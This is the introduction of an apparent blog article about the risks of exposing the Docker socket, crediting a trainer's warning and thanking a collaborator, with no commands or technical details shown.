This article comes from a quote by Jérôme Petazzoni at the very beginning of one of his awesome trainings: "Don't expose your docker socket". I asked "Why?" and Jérôme replied "Because it gives control on the host and nearby containers". Then I thought: Challenge accepted! Thanks Jérôme for sharing and for feeding my curiosity.

Thanks to padawan Mihail for joining me along this work and exploring some crazy ideas with me (and supporting me while whining because my shell commands were not working ;-) ).
